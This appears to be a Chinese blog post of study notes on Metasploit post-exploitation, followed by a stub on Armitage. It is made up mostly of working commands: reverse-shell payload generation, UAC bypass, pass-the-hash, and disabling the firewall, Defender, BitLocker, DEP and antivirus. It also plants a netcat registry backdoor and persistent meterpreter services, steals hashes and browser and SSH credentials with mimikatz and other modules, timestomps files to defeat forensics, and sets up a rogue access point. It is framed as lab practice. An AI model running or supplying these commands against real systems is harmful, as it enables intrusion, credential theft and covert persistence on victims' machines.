MSF学习（12）后渗透阶段 （13）armitage 图形化前端

十二：后渗透阶段

提权，信息收集，渗透内网，永久后门

1:基于已有的session扩大战果

root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=1234 -e x86/shikata_ga_nai -f vba-exe

演示就不利用漏洞，直接用payload进行获得shell

root@kali:~#  msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=1234 -b "\x00"  -e x86/shikata_ga_nai -i 7 -o kk.exe(32位)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=7777 -f exe -o ak.exe（64位）

把exe复制到阿帕奇网站目录，便于widows7下载

root@kali:~# cp kk.exe /var/www/html/

 

 

 

 

 

msf5 use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.168.1.10

msf5 exploit(multi/handler) > set lport 7777

msf5 exploit(multi/handler) > exploit

 

 

 

 

 

2:获取系统帐号权限

 

 

 

 

被拒绝，UAC权限限制，需要绕过

3：绕过UAC权限限制

 

(1)

msf5 exploit(windows/local/bypassuac) > use exploit/windows/local/ask

msf5 exploit(windows/local/ask) > show options

msf5 exploit(windows/local/ask) > set payload windows/meterpreter/reverse_tcp

msf5 exploit(windows/local/ask) > set lhost 192.168.1.10

msf5 exploit(windows/local/ask) > set filename wn_updata.exe

msf5 exploit(windows/local/ask) > set session 1

msf5 exploit(windows/local/ask) > exploit

名字取好一点，用户点击就可以绕过UAC

 

 

 

 

成功获得系统权限

 

 

 

 

 

(2)(64位操作系统windows7为例子，无须诱导即可UAC绕过)

msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac

msf5 exploit(windows/local/bypassuac) > show options

msf5 exploit(windows/local/bypassuac) > set payload windows/meterpreter/reverse_tcp

msf5 exploit(windows/local/bypassuac) > set lhost 192.168.1.10

msf5 exploit(windows/local/bypassuac) > set session 1

msf5 exploit(windows/local/bypassuac) > show targets

msf5 exploit(windows/local/bypassuac) > set target 1

 

 

 

 

成功

 

 

 

 

Hashdump(取得系统的sessions就可以把hash dump出来)

 

(3)msf5 exploit(windows/local/bypassuac) > use exploit/windows/local/bypassuac_injection

由于我的版本是64位，所以失败了，不过前面这个虽然也需要32位版本，但成功了

 

 

 

 

 

4：利用本地漏洞直接提权

(1)版本需求,32位

 

 

 

 

 

 

msf5 exploit(windows/local/bypassuac_injection) > use exploit/windows/local/ms13_053_schlamperei

 

 

 

set target 1

 

(2)32位

msf5 exploit(windows/local/ms13_053_schlamperei) > use exploit/windows/local/ms13_081_track_popup_menu

 

(3)其他模块

msf5 exploit(windows/local/ms13_081_track_popup_menu) > use exploit/windows/local/ms13_097_ie_registry_symlink

msf5 exploit(windows/local/ms13_097_ie_registry_symlink) > use exploit/windows/local/ppr_flatten_rec

 

可以选择多种模块来试一试

 

 

(4)可视化payload,可以进行控制

在sessions的基础下可以

msf5 exploit(windows/local/bypassuac) > set payload payload/windows/vncinject/reverse_tcp

msf5 exploit(windows/local/bypassuac) > set viewonly no（这个就是控制的关键）

 

 

 

 

 

 

 

 

 

 

 

成功

 

Hashdump(基于系统权限)

可能会报错

 

 

 

 

 

解决：

meterpreter >  getprivs

再把进程迁移到系统进程即可

 

 

 

 

5：使用哈希密码进行密码身份认证

msf5 exploit(windows/local/bypassuac) > use exploit/windows/smb/psexec

msf5 exploit(windows/smb/psexec) > show options

msf5 exploit(windows/smb/psexec) > set rhosts 192.168.1.8

msf5 exploit(windows/smb/psexec) > set smbuser delusion

msf5 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:d0c9ab2c9d99e0a93f1707

msf5 exploit(windows/smb/psexec) > exploit

 

 

 

 

 

 

 

 

记得设置payload

成功

PS:需要提前关闭uac

步骤：进入shell

 

 

 

 

依次输入这些命令再重启即可

 

 

 

 

 

 

6：关闭windwos防火墙

需要管理员和system权限

在shell里面执行命令

 

 

 

 

C:\Windows\system32>netsh advfirewall set allprofiles state off

 

 

 

 

打开用on

 

7:关闭windefend(windows自己的防护)

C:\Windows\system32>net stop windefend

 

 

 

 

 

 

8:bitlocker磁盘加密(关闭windows的磁盘加密)

C:\Windows\system32>manage-bde -off C(关闭加密)

C:\Windows\system32>manage-bde -status(看是否加密)

应该是中文原因所以乱码了，但还是可以看到

 

 

 

 

 

9：关闭DEP(硬件防护系统)

关闭成功

C:\Windows\system32>bcdedit.exe /set {current} nx AlwayxOff

 

10:杀死防病毒软件

(1)meterpreter > run killav

 

 

 

 

(2)meterpreter > run post/windows/manage/killav

 

 

 

 

 

11:启动远程管理工具

(1)

meterpreter > run  post/windows/manage/enable_rdp

打开远程端口和服务，会自动保存一个关闭文件

 

 

 

 

root@kali:~# rdesktop 192.168.1.8

远程连接

关闭远程桌面服务

meterpreter > run multi_console_command -r /root/.msf4/loot/20200521092947_default_192.168.1.8_host.windows.cle_029447.txt

 

 

 

 

 

 

 

 

 

 

(2)开启远程桌面服务

meterpreter > run getgui -e

 

 

 

 

 

添加远程桌面帐号，即可以不用知道帐号密码来远程桌面

meterpreter > run getgui -u admin -p 123456

注意，有些版本不支持

 

 

 

 

 

12：查看远程桌面

(1)

meterpreter > screenshot (截图桌面)

(2)

meterpreter > use espia

meterpreter > screengrab

 

 13：token

use exploit/windows/local/bypassuac

 

 

 

 

 

 

 

 

 

 

 

 

 

 

域环境下比较多，企业环境比较多

 

14:注册表，前提：已经取得shell

 

 

 

 

 

(1)注册表添加nc后门服务，适用ip固定的

meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C"\windwos\system32\nc.exe -Ldp 444 -e cmd.exe'

meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

Key: HKLM\software\microsoft\windows\currentversion\Run

 

 

 

 

 

 

(2)打开防火墙允许端口（meterpreter）

meterpreter > execute -f cmd -i H(隐蔽方式进入命令提示符)

C:\Windows\System32>netsh firewall show opmode(看防火墙状态)

C:\Windows\System32>netsh firewall add portopening TCP 4444 "Kk"(进程名字，可以具有欺骗性) ENABLE ALL

netsh firewall add portopening TCP 4444 "Kk" ENABLE ALL

C:\Windows\System32>shutdown -r -t 0(重启即可)

C:\Windows\System32>nc 192.168.1.8 4444  (nc连接即可)

 

 

 

 

 

15:后渗透信息收集抓包

meterpreter > load sniffer (导入模块)

meterpreter > sniffer_interfaces (查看信息，可用抓包模块)

meterpreter > sniffer_start 2

meterpreter > sniffer_dump 2 1.cap

 

 

 

 

 

 

 

 

 

 

解码

meterpreter > background

msf5 exploit(windows/local/bypassuac) > use auxiliary/sniffer/psnuffle

msf5 auxiliary(sniffer/psnuffle) > show options

msf5 auxiliary(sniffer/psnuffle) > set pcapfile /root/1.cap

msf5 auxiliary(sniffer/psnuffle) > run

可以用wireshark也行

 

16：搜索文件

meterpreter > search -f *.ini (全局搜索)

meterpreter > search -d c:\\documents\ and\ settings\\administrator\\desktop\\ -f *.dock(指定目录搜索)

 

 

 

 

17：john the ripper 破解弱口令

msf5 auxiliary(sniffer/psnuffle) > use post/windows/gather/hashdump (system权限)

msf5 post(windows/gather/hashdump) > show options

msf5 post(windows/gather/hashdump) > set session 2

msf5 post(windows/gather/hashdump) > exploit (结果在/tmp目录下)

 

简单密码破解

exploit即可

 

 

 

 

18：销毁痕迹，防止电子取证，销毁文件系统访问痕迹

(meterpreter基于内存，更隐秘)

 

(1)Mac时间

修改内容会使文件修改时间改变

观看内容会使文件观看时间改变

修改文件属性权限也会使文件修改权限时间改变

 

查看对应的时间

root@kali:~# ls -l 1.txt

root@kali:~# ls -l --time=atime 1.txt

root@kali:~# ls -l --time=ctime 1.txt

root@kali:~# stat 1.txt

root@kali:~# touch -d "2 day ago" 1.txt把时间提前两天

root@kali:~# touch -t 0101010101 1.txt(对应年月日时分)

 

 

 

 

 

 

 

 

 

可以看到改变了

 

但changge时间不会改变

 

 

 

 

(2)模块修改时间，能力更大(timestomp)

PS:时间不要改的太离谱

基于meterprter

 

 

 

 

 

 

 

 

Mac都可以修改设置

meterpreter > pwd

meterpreter > ls

 

 

 

 

 

meterpreter > timestomp -v 1.txt.txt(显示具体信息)

 

 

 

 

 

meterpreter > timestomp 1.txt.txt -f msf.pdf

把1.txt.txt的时间改为与msf.pdf一样

 

 

 

 

 

自定义改时间

 

 

 

 

-a -c -m -e 对应

Modified       : 2020-05-20 11:33:20 +0800

Accessed      : 2020-05-20 11:27:02 +0800

Created       : 2020-05-20 11:27:02 +0800

Entry Modified: 2020-05-20 11:33:54 +0800

-z 对应全部

 

 

 

 

 

 

 

 

 

 

 

 

 

 

19:pivoting跳板/枢纽/支点5

也就是说先控制一台机器，然后再攻击其内部网络的其他机器

msf5 exploit(windows/local/bypassuac) > use auxiliary/scanner/portscan/tcp

 

 

 

 

 

 

 

 

考虑映射ip端口，因为两边都有防火墙

 

20：常用的POST模块

(1):(arp扫描模块)

meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24

 

 

 

 

(2)(看是否为虚拟机)

meterpreter > run post/windows/gather/checkvm

 

 

 

 

(3):（查看hash)

meterpreter > run post/windows/gather/credentials/credential_collector

 

 

 

(4): (装的软件以及版本)

meterpreter > run post/windows/gather/enum_applications

 

 

 

 

(5): (当前登录的用户)

meterpreter >run post/windows/gather/enum_logged_on_users

 

 

 

 

(6): (查看snmp的配置，如果目标有的话)

meterpreter > run post/windows/gather/enum_snmp

 

 

 

 

(7):(查看local漏洞，本地提权)

meterpreter > run post/multi/recon/local_exploit_suggester

 

 

 

 

(8):(删除目标系统用户名对应的帐号)

meterpreter > run post/windows/manage/delete_user USERNAME=admin

(9):（查看配置信息）

meterpreter > run post/multi/gather/env

 

 

 

 

 

 

 

 

(10)查看火狐浏览器的帐号密码

meterpreter > run post/multi/gather/firefox_creds

查看火狐浏览器的帐号密码

(11)收集ssh的密码信息

meterpreter > run post/multi/gather/ssh_creds

 

(12)(看文件是否为恶意文件)

meterpreter > run post/multi/gather/check_malware REMOTEFILE=C:\\Users\\delusion\\Desktop\\msf.pdf

 

21自动执行meterpreter脚本

就是说用户一点击就执行

msf5 exploit(windows/local/bypassuac) > advanced

查看高级选项，一般里面就有自动化脚本选项

msf5 exploit(windows/local/bypassuac) > set AutoRunScript migrate -n explorer.exe(自动迁移到这个系统软件的脚本)

msf5 exploit(windows/local/bypassuac) > set AutoRunScript  set target 1post/windows/gather/dumplinks(前提必须要把用户进行调整)

(自动收集快捷方式)

这个脚本只能用一条命令，所有用迁移进程是最好的

msf5 exploit(windows/local/bypassuac) > set InitialAutoRunScript post/windows/gather/dumplinks(意思是先运行auto脚本，再运行这一脚本)];

进行劫持

把www.abcbaidu.com解析为2.2.2.2的ip

 

 

 

 

 

 

 

 

 

22:持久后门

 

 

 

 

(1):meterpreter后门

 

 

 

 

meterpreter > run metsvc -A

 

 

 

 

msf5 exploit(windows/local/bypassuac) > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/metsvc_bind_tcp

msf5 exploit(multi/handler) > set lport 31337

msf5 exploit(multi/handler) > set rhost 192.168.1.8

msf5 exploit(multi/handler) > exploit

后门不理想，密码没有，端口一直开 set target 1

(2):持久后门

meterpreter > run persistence -h

 

 

 

 

meterpreter > run persistence -x -r 192.168.1.10 -p 1234

 

 

 

 

meterpreter > exit

msf5 exploit(windows/local/bypassuac) > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.168.1.10

msf5 exploit(multi/handler) > set lport 1234

msf5 exploit(multi/handler) > set exitonsession false

msf5 exploit(multi/handler) > exploit -j -z

重启windwos即可

可以看到成功了

 

 

 

 

 

 

23:MSF延展用法之Mimikatz

meterpreter > getsystem

meterpreter > load mimikatz

meterpreter > help

 

 

 

 

meterpreter >msv(获取哈希值)

 

 

 

meterpreter > ssp

 

 

 

 

meterpreter > tspkg

(看系统信息和哈希)

 

meterpreter > wdigest

meterpreter > kerberos

(看密码)

meterpreter > mimikatz_command

 

 

 

 

里面的模块

 

 

 

 

 

 

 

 

最后一个模块是拿来玩扫雷游戏的，就别看了有start ,cheat,等功能

24：PHPshell

通过浏览器来反弹shell

 

 

 

 

把php拷贝到网站目录即可，前提得有这个漏洞，可以用dvwa来进行实验

 

25：web delivery

如果服务器有代码执行漏洞，可以用dvwa来进行实验

 

 

 

 

 

26：RFI远程文件包含

 

 

 

 

 

27：Karmetasploit

 

 

 

 

先用无线伪造AP，然后再用msf模块对流经的流量进行分析，浏览器攻击

root@kali:~# wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt

下载模块

 

 

 

 

相当于一个脚本，自己可以设置

伪造ap参考wlan无线笔记

 

基础架构配置

 

 

 

 

root@kali:~# vi /etc/dhcp/dhcpd.conf

 

 

 

 

 

 

 

 

伪造AP

 

 

 

 

 

 

 

 

就可以了

由于没有用AP连接网络，但需要修改才可以造成欺骗效果

 

客户无法正常上网

root@kali:~# vi karma.rc_.txt

 

 

 

 

 

 

把setg的全部参数全部删除

 

 

 

 

 

 

 

 

 

 

添加路由和防火墙规则

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

root@kali:~# iptables -P FORWARD ACCEPT

root@kali:~# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERAD

 

28：十三：armitage 图形化前端

 

由于msf更新导致其不兼容，所以2020新版

Kali已经没有了这一软件，可以安旧版本，或者参考这一博客

https://www.jianshu.com/p/412ce1fc7adc

 

 

 

 

作者有点懒。。。。。